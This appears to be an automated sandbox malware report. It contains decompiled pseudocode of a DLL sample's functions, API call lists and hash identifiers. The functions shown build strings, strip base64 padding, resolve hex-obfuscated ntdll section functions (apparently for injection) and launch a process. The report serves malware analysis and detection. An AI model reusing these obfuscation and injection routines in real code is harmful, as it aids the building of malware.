                                                  							}
                                                  							HeapFree( *0xecd238, 0, _t103);
                                                  						}
                                                  						HeapFree( *0xecd238, 0, _t100);
                                                  					}
                                                  					HeapFree( *0xecd238, 0, _a24);
                                                  				}
                                                  				HeapFree( *0xecd238, 0, _t105);
                                                  				return _a12;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00ECA290
                                                  • wsprintfA.USER32 ref: 00ECA2DD
                                                  • wsprintfA.USER32 ref: 00ECA2FA
                                                  • wsprintfA.USER32 ref: 00ECA31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00ECA32D
                                                  • wsprintfA.USER32 ref: 00ECA34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00ECA35F
                                                  • wsprintfA.USER32 ref: 00ECA396
                                                  • wsprintfA.USER32 ref: 00ECA3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00ECA3D3
                                                  • GetTickCount.KERNEL32 ref: 00ECA3E3
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00ECA3F7
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00ECA415
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?,030095B0), ref: 00EC8332
                                                    • Part of subcall function 00EC8307: lstrlen.KERNEL32(?,?,?,00ECA428,?,030095B0), ref: 00EC833A
                                                    • Part of subcall function 00EC8307: strcpy.NTDLL ref: 00EC8351
                                                    • Part of subcall function 00EC8307: lstrcat.KERNEL32(00000000,?), ref: 00EC835C
                                                    • Part of subcall function 00EC8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC8379
                                                  • StrTrimA.SHLWAPI(00000000,00ECC2AC,?,030095B0), ref: 00ECA447
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(030087FA,00000000,00000000,74ECC740,00ECA453,00000000), ref: 00EC3CD8
                                                    • Part of subcall function 00EC3CC8: lstrlen.KERNEL32(?), ref: 00EC3CE0
                                                    • Part of subcall function 00EC3CC8: lstrcpy.KERNEL32(00000000,030087FA), ref: 00EC3CF4
                                                    • Part of subcall function 00EC3CC8: lstrcat.KERNEL32(00000000,?), ref: 00EC3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00ECA466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00ECA46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00ECA47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00ECA47E
                                                    • Part of subcall function 00EC1199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 00EC124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00ECA4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00ECA4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,030095B0), ref: 00ECA4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00ECA4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00ECA4ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID: _h
                                                  • API String ID: 3080378247-4139817520
                                                  • Opcode ID: ff8db47ac72771a3b6529f921b05a42f13a4a78868396d1e10ee975d34d9199b
                                                  • Instruction ID: 73fb0122b79fd6387bbce1426b46c470feb3f482a212a20ff1181b7f8fd9884d
                                                  • Opcode Fuzzy Hash: ff8db47ac72771a3b6529f921b05a42f13a4a78868396d1e10ee975d34d9199b
                                                  • Instruction Fuzzy Hash: B961BC71504204AFC7119B6AEC4AF5A77E9EB48314F190038F918F7271DB37E80B9B66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E00EC816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				long _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				void* __esi;
                                                  				long _t43;
                                                  				intOrPtr _t44;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				intOrPtr _t66;
                                                  				void* _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t75;
                                                  				void* _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t91;
                                                  
                                                  				_t79 =  *0xecd33c; // 0x3009bc8
                                                  				_v24 = 8;
                                                  				_t43 = GetTickCount();
                                                  				_push(5);
                                                  				_t74 = 0xa;
                                                  				_v16 = _t43;
                                                  				_t44 = E00EC70F5(_t74,  &_v16);
                                                  				_v8 = _t44;
                                                  				if(_t44 == 0) {
                                                  					_v8 = 0xecc1ac;
                                                  				}
                                                  				_t46 = E00EC8022(_t79);
                                                  				_v12 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t80 = __imp__;
                                                  					_t48 =  *_t80(_v8, _t71);
                                                  					_t49 =  *_t80(_v12);
                                                  					_t50 =  *_t80(_a4);
                                                  					_t54 = E00EC2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                  					_v20 = _t54;
                                                  					if(_t54 != 0) {
                                                  						_t75 =  *0xecd27c; // 0x213a5a8
                                                  						_t16 = _t75 + 0xeceb28; // 0x530025
                                                  						 *0xecd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                  						_push(4);
                                                  						_t77 = 5;
                                                  						_t57 = E00EC70F5(_t77,  &_v16);
                                                  						_v8 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_v8 = 0xecc1b0;
                                                  						}
                                                  						_t58 =  *_t80(_v8);
                                                  						_t59 =  *_t80(_v12);
                                                  						_t60 =  *_t80(_a4);
                                                  						_t91 = E00EC2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                  						if(_t91 == 0) {
                                                  							E00EC9039(_v20);
                                                  						} else {
                                                  							_t66 =  *0xecd27c; // 0x213a5a8
                                                  							_t31 = _t66 + 0xecec48; // 0x73006d
                                                  							 *0xecd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                  							 *_a16 = _v20;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_a20 = _t91;
                                                  						}
                                                  					}
                                                  					E00EC9039(_v12);
                                                  				}
                                                  				return _v24;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00EC8181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00EC81C1
                                                  • lstrlen.KERNEL32(00000000), ref: 00EC81CA
                                                  • lstrlen.KERNEL32(00000000), ref: 00EC81D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 00EC81DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 00EC823E
                                                  • lstrlen.KERNEL32(?), ref: 00EC8247
                                                  • lstrlen.KERNEL32(?), ref: 00EC824E
                                                  • lstrlenW.KERNEL32(?), ref: 00EC8255
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: faf4f67aa085b97f44aff6052a9d934dc0283d811c544fd7b29f5435ea7371fe
                                                  • Instruction ID: 6fa7ef4da559ad12a29195d6707e943bbbb4edf4022bd4f98fa32a55dd3f31f6
                                                  • Opcode Fuzzy Hash: faf4f67aa085b97f44aff6052a9d934dc0283d811c544fd7b29f5435ea7371fe
                                                  • Instruction Fuzzy Hash: 84412B72800119EFDF11AFA5CE0AE9EBBB5EF48314F154065ED04B7221DB369A16EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00EC205E(void* __eax, void* __ecx) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				long _v32;
                                                  				void _v104;
                                                  				char _v108;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				void* _t58;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t71;
                                                  
                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                  				_t69 =  *_t1;
                                                  				_t36 = E00EC692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                  				_v8 = _t36;
                                                  				if(_t36 != 0) {
                                                  					L12:
                                                  					return _v8;
                                                  				}
                                                  				E00ECA8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                  				_t40 = _v12(_v12);
                                                  				_v8 = _t40;
                                                  				if(_t40 == 0 && ( *0xecd260 & 0x00000001) != 0) {
                                                  					_v32 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v108 = 0;
                                                  					memset( &_v104, 0, 0x40);
                                                  					_t47 =  *0xecd27c; // 0x213a5a8
                                                  					_t18 = _t47 + 0xece3e6; // 0x73797325
                                                  					_t68 = E00EC95B1(_t18);
                                                  					if(_t68 == 0) {
                                                  						_v8 = 8;
                                                  					} else {
                                                  						_t50 =  *0xecd27c; // 0x213a5a8
                                                  						_t19 = _t50 + 0xece747; // 0x3008cef
                                                  						_t20 = _t50 + 0xece0af; // 0x4e52454b
                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                  						if(_t71 == 0) {
                                                  							_v8 = 0x7f;
                                                  						} else {
                                                  							_v108 = 0x44;
                                                  							E00EC84D5();
                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                  							_push(1);
                                                  							E00EC84D5();
                                                  							if(_t58 == 0) {
                                                  								_v8 = GetLastError();
                                                  							} else {
                                                  								CloseHandle(_v28);
                                                  								CloseHandle(_v32);
                                                  							}
                                                  						}
                                                  						HeapFree( *0xecd238, 0, _t68);
                                                  					}
                                                  				}
                                                  				_t70 = _v16;
                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                  				E00EC9039(_t70);
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00EC207A,?,00000001,?,?,00000000,00000000), ref: 00EC6951
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00EC6973
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00EC6989
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00EC699F
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00EC69B5
                                                    • Part of subcall function 00EC692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00EC69CB
                                                  • memset.NTDLL ref: 00EC20C8
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00EC1354,73797325), ref: 00EC95C2
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00EC95DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,03008CEF,73797325), ref: 00EC20FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EC2105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00EC216D
                                                    • Part of subcall function 00EC84D5: GetProcAddress.KERNEL32(36776F57,00EC21E5), ref: 00EC84F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00EC214A
                                                  • CloseHandle.KERNEL32(?), ref: 00EC214F
                                                  • GetLastError.KERNEL32(00000001), ref: 00EC2153
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: c9f179db61a54b11212998cb605e05d10147cd21f400c93a91f1b672a0af9eff
                                                  • Instruction ID: a887c220b1e4e3b29b0d94572dff915d2ba9bef9f6623a289514f25de28e7b73
                                                  • Opcode Fuzzy Hash: c9f179db61a54b11212998cb605e05d10147cd21f400c93a91f1b672a0af9eff
                                                  • Instruction Fuzzy Hash: 95314CB2800208EFDB109FA5DD89E9EBBBCEB08344F15446AE605B7221D7369D0A8B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E00EC8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t13;
                                                  				char* _t28;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				char* _t36;
                                                  				intOrPtr* _t40;
                                                  				char* _t41;
                                                  				char* _t42;
                                                  				char* _t43;
                                                  
                                                  				_t34 = __edx;
                                                  				_push(__ecx);
                                                  				_t9 =  *0xecd27c; // 0x213a5a8
                                                  				_t1 = _t9 + 0xece62c; // 0x253d7325
                                                  				_t36 = 0;
                                                  				_t28 = E00EC9401(__ecx, _t1);
                                                  				if(_t28 != 0) {
                                                  					_t40 = __imp__;
                                                  					_t13 =  *_t40(_t28);
                                                  					_v8 = _t13;
                                                  					_t41 = E00EC2049(_v8 +  *_t40(_a4) + 1);
                                                  					if(_t41 != 0) {
                                                  						strcpy(_t41, _t28);
                                                  						_pop(_t33);
                                                  						__imp__(_t41, _a4);
                                                  						_t36 = E00EC7225(_t34, _t41, _a8);
                                                  						E00EC9039(_t41);
                                                  						_t42 = E00EC8E82(StrTrimA(_t36, "="), _t36);
                                                  						if(_t42 != 0) {
                                                  							E00EC9039(_t36);
                                                  							_t36 = _t42;
                                                  						}
                                                  						_t43 = E00EC788B(_t36, _t33);
                                                  						if(_t43 != 0) {
                                                  							E00EC9039(_t36);
                                                  							_t36 = _t43;
                                                  						}
                                                  					}
                                                  					E00EC9039(_t28);
                                                  				}
                                                  				return _t36;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC9401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,00EC8321,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?), ref: 00EC9468
                                                    • Part of subcall function 00EC9401: sprintf.NTDLL ref: 00EC9489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00ECA428,?,030095B0), ref: 00EC8332
                                                  • lstrlen.KERNEL32(?,?,?,00ECA428,?,030095B0), ref: 00EC833A
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • strcpy.NTDLL ref: 00EC8351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00EC835C
                                                    • Part of subcall function 00EC7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00EC836B,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC723C
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00ECA428,?,030095B0), ref: 00EC8379
                                                    • Part of subcall function 00EC8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00EC8385,00000000,?,?,00ECA428,?,030095B0), ref: 00EC8E8C
                                                    • Part of subcall function 00EC8E82: _snprintf.NTDLL ref: 00EC8EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: dbc16667235cda8ae65ccec54cd089fbfac5c05125ae718ad1b89d4c757ea7d9
                                                  • Instruction ID: 199431edb5b6ea2558b4444574cd2623d61696c50e3aaedc0c4987a0e47ec5f7
                                                  • Opcode Fuzzy Hash: dbc16667235cda8ae65ccec54cd089fbfac5c05125ae718ad1b89d4c757ea7d9
                                                  • Instruction Fuzzy Hash: B311E733501624AB46116BF99F8AE6E36DDAF44764305202EF904B7202CE37DD0397A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EC6D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 00EC6D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EC6D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC6DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC6DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC6DC3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: b7dfdbf2ee01cae2dc1c550cb940f8d1d99ec1ea95adf9f90e73552ed7364eae
                                                  • Instruction ID: 3a3836597335aec2acb86d94c73ac74396fc6dcafdb99a4206f6073e42a87cb1
                                                  • Opcode Fuzzy Hash: b7dfdbf2ee01cae2dc1c550cb940f8d1d99ec1ea95adf9f90e73552ed7364eae
                                                  • Instruction Fuzzy Hash: 2E315132D00609AFDF01EFB8C944A9FBBB5AF49304F144469E915FB120D7729D0ACB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t26;
                                                  				_Unknown_base(*)()* _t28;
                                                  				intOrPtr _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				intOrPtr _t33;
                                                  				_Unknown_base(*)()* _t35;
                                                  				intOrPtr _t36;
                                                  				_Unknown_base(*)()* _t38;
                                                  				intOrPtr _t39;
                                                  				_Unknown_base(*)()* _t41;
                                                  				intOrPtr _t44;
                                                  				struct HINSTANCE__* _t48;
                                                  				intOrPtr _t54;
                                                  
                                                  				_t54 = E00EC2049(0x20);
                                                  				if(_t54 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t23 =  *0xecd27c; // 0x213a5a8
                                                  					_t1 = _t23 + 0xece11a; // 0x4c44544e
                                                  					_t48 = GetModuleHandleA(_t1);
                                                  					_t26 =  *0xecd27c; // 0x213a5a8
                                                  					_t2 = _t26 + 0xece769; // 0x7243775a
                                                  					_v8 = 0x7f;
                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                  					 *(_t54 + 0xc) = _t28;
                                                  					if(_t28 == 0) {
                                                  						L8:
                                                  						E00EC9039(_t54);
                                                  					} else {
                                                  						_t30 =  *0xecd27c; // 0x213a5a8
                                                  						_t5 = _t30 + 0xece756; // 0x614d775a
                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                  						 *(_t54 + 0x10) = _t32;
                                                  						if(_t32 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t33 =  *0xecd27c; // 0x213a5a8
                                                  							_t7 = _t33 + 0xece40b; // 0x6e55775a
                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                  							 *(_t54 + 0x14) = _t35;
                                                  							if(_t35 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t36 =  *0xecd27c; // 0x213a5a8
                                                  								_t9 = _t36 + 0xece4d2; // 0x4e6c7452
                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                  								 *(_t54 + 0x18) = _t38;
                                                  								if(_t38 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t39 =  *0xecd27c; // 0x213a5a8
                                                  									_t11 = _t39 + 0xece779; // 0x6c43775a
                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                  									 *(_t54 + 0x1c) = _t41;
                                                  									if(_t41 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                  										_t44 = E00EC727B(_t54, _a8);
                                                  										_v8 = _t44;
                                                  										if(_t44 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a12 = _t54;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00EC207A,?,00000001,?,?,00000000,00000000), ref: 00EC6951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00EC6973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00EC6989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00EC699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00EC69B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00EC69CB
                                                    • Part of subcall function 00EC727B: memset.NTDLL ref: 00EC72FA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 595d17303353258b788b8943cfa5fab2a502e439d40d62c63181ccf3f0c19e50
                                                  • Instruction ID: 5106cbad15c569e1d709629c9abcd5277bc51c3d83575de517c453ddc1aca6a9
                                                  • Opcode Fuzzy Hash: 595d17303353258b788b8943cfa5fab2a502e439d40d62c63181ccf3f0c19e50
                                                  • Instruction Fuzzy Hash: AB216DB150120ADFDB20DFAADD44E6B77ECEB08344716517AEA15E7311D632ED068B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC7323(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				int _v12;
                                                  				signed int _v16;
                                                  				void* _v20;
                                                  				signed char _v36;
                                                  				void* __ebx;
                                                  				void* _t24;
                                                  				intOrPtr _t27;
                                                  				signed char* _t46;
                                                  				void* _t52;
                                                  				int _t54;
                                                  				void* _t56;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  
                                                  				_t52 = __edx;
                                                  				_v16 = _v16 & 0x00000000;
                                                  				_t46 = _a4;
                                                  				_t54 = ( *_t46 & 0x000000ff) + 0x90;
                                                  				_v12 = 0x90;
                                                  				_t24 = E00EC2049(_t54);
                                                  				_a4 = _t24;
                                                  				if(_t24 != 0) {
                                                  					memcpy(_t24,  *0xecd2d4, 0x90);
                                                  					_t27 =  *0xecd2d8; // 0x0
                                                  					_t58 = _t57 + 0xc;
                                                  					if(_t27 != 0) {
                                                  						E00EC8F83(_t46, _a4, 0x90, _t27, 0);
                                                  					}
                                                  					if(E00ECA7C2( &_v36) != 0 && E00EC6DE4(0x90, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
                                                  						_t56 = _v20;
                                                  						_v36 =  *_t46;
                                                  						_v16 = E00EC6F1D(_t56, _a8, _t52, _t46, _a12);
                                                  						 *(_t56 + 4) = _v36;
                                                  						_t20 =  &(_t46[4]); // 0x8b4875fc
                                                  						memset(_t56, 0, _v12 - ( *_t20 & 0xf));
                                                  						_t58 = _t58 + 0xc;
                                                  						E00EC9039(_t56);
                                                  					}
                                                  					memset(_a4, 0, _t54);
                                                  					E00EC9039(_a4);
                                                  				}
                                                  				return _v16;
                                                  			}

                                                  Instruction addresses: 0x00ec7323 0x00ec7329 0x00ec732e 0x00ec733b 0x00ec733e 0x00ec7341 0x00ec7348 0x00ec734b 0x00ec7359 0x00ec735e 0x00ec7363 0x00ec7368 0x00ec7373 0x00ec7373 0x00ec7382 0x00ec73a5 0x00ec73ab 0x00ec73b9 0x00ec73bf 0x00ec73c2 0x00ec73cf 0x00ec73d4 0x00ec73d8 0x00ec73d8 0x00ec73e3 0x00ec73ee 0x00ec73ee 0x00ec73fa

                                                  APIs
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • memcpy.NTDLL(00000000,00000090,00000002,00000002,_h,00000008,_h,_h,?,00EC858C,_h), ref: 00EC7359
                                                  • memset.NTDLL ref: 00EC73CF
                                                  • memset.NTDLL ref: 00EC73E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memset$AllocateHeapmemcpy
                                                  • String ID: _h$_h
                                                  • API String ID: 1529149438-1171608278
                                                  • Opcode ID: 5c151f7181da0136d3d24e57c67cfb6a57558cb42cea851cfb12974789c4677b
                                                  • Instruction ID: 7c575f9e871c15f94580a97869250aaea072c80aff3bfebf4e7f49be0018b813
                                                  • Opcode Fuzzy Hash: 5c151f7181da0136d3d24e57c67cfb6a57558cb42cea851cfb12974789c4677b
